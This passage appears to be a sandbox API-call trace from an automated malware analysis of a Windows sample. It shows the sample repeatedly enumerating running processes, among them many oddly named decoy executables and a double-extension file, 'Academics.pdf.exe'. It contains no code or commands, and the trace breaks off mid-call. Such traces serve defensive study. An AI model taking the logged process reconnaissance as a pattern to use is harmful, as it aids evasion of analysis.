pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.451] CloseHandle (hObject=0x294) returned 1 [0291.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.451] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.452] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.454] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.492] Process32NextW (in: 